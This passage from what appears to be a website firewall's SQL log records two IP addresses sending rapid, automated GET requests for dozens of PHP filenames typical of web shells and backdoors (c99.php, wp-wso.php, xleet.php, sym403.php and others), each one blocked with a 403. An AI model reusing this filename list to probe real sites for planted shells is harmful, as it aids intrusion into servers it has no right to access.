Safari\\/537.36\"}','Ip6HdBbUWnwvlLYZmXOrDcaS',0,1674925221.7973,187,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qNOMYPiQAwLogSGlBcT0nDIe',0,1674925222.4005,211,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','G4WSD9Qmfv8s5aP7Or2CcZiw',0,1674925223.0333,166,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wqmNIv2fZt5AgR3Xe8ib6jPE',0,1674925223.6234,165,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q317rjnvtslzcifYOhxSIGJ0',0,1674925224.2216,173,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0WbEpI9MDkySaZlgcrQ6jJL7',0,1674925224.8233,173,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LJRFXloQwW2ptOHq60jKVg8n',0,1674925225.4113,184,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1oF25pSthgVY7XZc6ExudINL',0,1674925226.0161,217,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8PdnFoKvupESBfysRNkjCHiD',0,1674925226.6453,168,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-content/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OhVlUTtRXoFHZSqbBAu7xzMY',0,1674925227.2529,184,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PYQXMOnZbtrEFvmkjfo3xeNS',0,1674925228.3053,167,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IORlQmzDVG02qyUsEBo14evp',0,1674925228.8921,172,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lDLyuGRQsxjVkPA2cqodMfrT',0,1674925229.4758,170,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/wp-content/plugins/xwp/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','E597lHWCawbeDP2dsvJYNAqm',0,1674925230.0734,186,'','GET',403,0,700,0,1,'',0),('103.137.204.51',1737083955,'','https://www.dailyjolly.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EXL5OlYo7sza6xDA1JRv90CN',0,1674925230.6841,190,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mJeKLVSQWA67uDzgqd9ExUnt',0,1674932256.4657,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sAkD2PNTuVGlROZmCdieYFgx',0,1674932257.0791,185,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HF8UEx4zwCNqchtlrWRengGj',0,1674932257.7192,156,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IFtx90uQky7DWRiTmch65Haq',0,1674932258.3187,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','J9KaprNYzthlmIsFqT7Ee3VL',0,1674932259.0240,177,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qlLaDwBt1EPmszG7niF93TQS',0,1674932259.6870,164,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mzyKIY5RBFD7N3EQpCoHLilr',0,1674932260.2667,209,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DqQ13VONJ7r5LwieyaAHmRPn',0,1674932260.9184,167,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RuaGC72Lmpj9FJiltKgsUD0c',0,1674932261.5078,198,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zLA1ijmXak4gPNo9GpMh2tBv',0,1674932262.1288,159,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DKFnlwCQ63gVJkpb28UTIvmP',0,1674932262.7185,163,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','txu8mKbWoPhDCSsZ0cT1eOHQ',0,1674932263.3076,188,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HJNRbFv3dQ68VYaTCOS9Zptm',0,1674932263.9674,166,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','F0vAfLB7leREXzTSrowsjGp3',0,1674932264.5904,162,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','v0zaNZH8n1TdBipYmDestgXG',0,1674932265.1781,190,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NZbsO9pP2JaVGCXec8dE5KwS',0,1674932265.8075,185,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zDfayRZkbNj9FWH6gvVGu3mE',0,1674932266.4318,162,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eBZ6LRWI4O8EkbdNXxU31TiP',0,1674932267.0103,197,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bYyX5rfAH61DhaVqTlUup9x0',0,1674932267.6263,167,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Gdz5yHLsfPa4c0O3CwJYmVRK',0,1674932268.2088,192,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vqfnp7HtgXBOFj8lRQc4WLUE',0,1674932268.8284,162,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TOfSLeXd9VB8tCiQWrcpYzR5',0,1674932269.4095,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DCiN8tdMnOgkcbr1TZmWqj4Y',0,1674932269.9985,166,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WYueLGD5znbTipsIBOfyCZEV',0,1674932270.6138,174,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','C7dpNyO2Kgu5vqt6SIA1zwan',0,1674932271.2325,173,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','k81qhzuryTsEFVPwcSxfiAG3',0,1674932271.8571,233,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lzWfur2yjJ3dbqOBk7DFU5ZR',0,1674932272.5362,168,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','u6C5KbYWRz107cLBmUeFsJZI',0,1674932273.1200,167,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eEXvf6Kj7QF4lqD0BcgVOZN2',0,1674932273.6879,186,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VGAaYRDctWrMqTHkO03NFIEX',0,1674932274.3017,189,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V3iluwapk4v1eQTLUWBmFybZ',0,1674932274.9120,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1cugwSjTU0KLxtIFYby5p4a2',0,1674932275.5195,192,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ky3lGrfUgJnjYHBiDMX7sT9C',0,1674932276.1648,193,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E34e78xvc5YJF0y1zHPu9MaI',0,1674932276.8096,164,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0NSbRwi3tWnKMC4Zcxh8Pgdz',0,1674932277.3750,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LDPOYle51KXkZEUyg9Nq32RB',0,1674932277.9814,167,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ki8Q6DyaO0E7N3rLzMlYsjvU',0,1674932278.5673,194,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c4lWDX1wg3SV8xsZFJ9fLMOC',0,1674932279.1603,170,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lMuExKXLcQyoZdY5USH1ajJB',0,1674932279.7419,174,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qhFlIGTLQBjd4t0zsDeXif6M',0,1674932280.3581,179,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OlS7FuXtkpqUcezo1E4CIN63',0,1674932280.9705,209,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','phYi2M9EwtZkmDROJ3d7GVXF',0,1674932281.6136,181,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iFg7Cf8539qoxzAcG4pykdIa',0,1674932282.2175,170,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hT4S1tCA8H5Y0JojbFkmfEuy',0,1674932282.8475,178,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7lsHz2DndtBreoEu4PF51vAg',0,1674932283.4403,177,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KP8XkchW3Fap2swSTLoDGedO',0,1674932284.0495,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3jmzNAsE2G0VWrdtPSylwFk6',0,1674932284.6373,192,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PYMIfprcAvd4noNRCqzTE3mS',0,1674932285.2359,169,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CglFvU4uHkQ3hEbePiB8WoK9',0,1674932285.8281,183,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VNEf3CjkbpBdDr1quX7PlGwi',0,1674932286.4641,205,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JyTkZxKbgz3whOlvSu5todHB',0,1674932287.1326,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4IMBhLuwf1orpDSGq26mjvsb',0,1674932287.7429,166,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SNsPfQbFCgRUjuKTYr1WMEO4',0,1674932288.3243,173,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tywXBErC29M3zj5i0AnWG4OK',0,1674932288.9432,189,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jeEJyB2MbU8tXZ4Tupr0A1a9',0,1674932289.5630,182,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BbOrgJt2xMlnF8s1ohYvyH0L',0,1674932290.1883,170,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1SiGCqhVWQlpY7kK8wLsgU4H',0,1674932290.7755,168,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SzPAnUfXYTC6uwvrcas3NIml',0,1674932291.3657,203,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','C3nM7IxsQLHzjaB5DtEVTdvP',0,1674932292.0062,170,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kFR7OQUfJVgitXBD3uxPIl80',0,1674932292.5852,177,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0Y5A2nSylLpa8wrtXFR9gWiC',0,1674932293.1896,166,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4utmH9D7QBG3lrbvK0a1UwZq',0,1674932293.8097,172,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4BJ9ZOXYLeGH7WcMT0gzjqih',0,1674932294.3935,171,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nJTKtFmpNgfvy2YLExwQuz1b',0,1674932294.9994,168,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qPAej7oEuGt26WrBLYMHQizJ',0,1674932295.5873,166,'','GET',403,0,700,0,1,'',0),('172.174.224.29',2897141789,'','https://www.dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 